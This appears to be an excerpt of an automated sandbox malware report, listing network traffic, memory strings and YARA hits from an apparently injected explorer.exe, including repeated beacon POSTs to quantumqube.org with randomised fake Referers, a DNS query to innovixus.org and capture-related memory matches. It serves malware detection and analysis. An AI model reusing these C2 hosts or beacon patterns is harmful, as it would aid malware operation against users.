Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://raievqxnfbig.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: quantumqube.org
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vvywjtocjkatexf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: quantumqube.org
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mxfkxoyxtgh.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: quantumqube.org
Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qxdsgfawkutaw.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: quantumqube.org
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: explorer.exe, 0000000D.00000003.2621735460.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2621306051.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2447348106.0000000003510000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "www.facebook.com", equals www.facebook.com (Facebook)
Source: global traffic | DNS traffic detected: DNS query: quantumqube.org
Source: global traffic | DNS traffic detected: DNS query: innovixus.org
Source: unknown | HTTP traffic detected: POST /index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://upgyyhdoyghspm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 111 | Host: quantumqube.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Sun, 06 Oct 2024 19:27:36 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: keep-alive | Vary: Accept-Encoding | Server: namecheap-nginx | Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a | Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:27:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-alive
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:28:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:29:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:29:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:29:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:30:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:30:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drString found in binary or memory: http://jedwatson.github.io/classnames
                      Source: explorer.exe, 00000002.00000000.1473694819.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: explorer.exe, 00000002.00000000.1475801434.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                      Source: explorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.0000000003304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.000000000330C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.00000000032E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/
                      Source: explorer.exe, 00000007.00000002.2375965405.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/application/x-www-form-urlencodedMozilla/5.0
                      Source: explorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.0000000003304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2373953881.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2347347955.0000000000A79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3927428692.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3928236257.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3928453017.0000000003297000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3926853756.0000000000859000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3928965249.00000000033D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/index.php
                      Source: explorer.exe, 0000000D.00000003.3028814712.000000000526C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2721237512.000000000526C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.3328845519.0000000005270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/index.php.
                      Source: explorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2347347955.0000000000A79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3927428692.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3928236257.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3928453017.0000000003297000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3926853756.0000000000859000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3928965249.00000000033D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/index.phpMozilla/5.0
                      Source: explorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/index.phpn
                      Source: explorer.exe, 00000007.00000002.2375965405.00000000032C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/ndex.php
                      Source: explorer.exe, 00000007.00000002.2375965405.00000000032E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org:80/index.phpcrosoft
                      Source: explorer.exe, 00000002.00000000.1474886102.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1474899724.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1473187872.0000000002C80000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drString found in binary or memory: http://underscorejs.org/LICENSE
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
                      Source: explorer.exe, 00000002.00000000.1474139705.000000000702D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: explorer.exe, 00000002.00000000.1475801434.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                      Source: explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                      Source: explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drString found in binary or memory: https://github.com/jsstyles/css-vendor
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
                      Source: explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drString found in binary or memory: https://lodash.com/
                      Source: explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drString found in binary or memory: https://lodash.com/license
                      Source: explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drString found in binary or memory: https://openjsf.org/
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
                      Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: Yara match | File source: 0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7064, type: MEMORYSTR
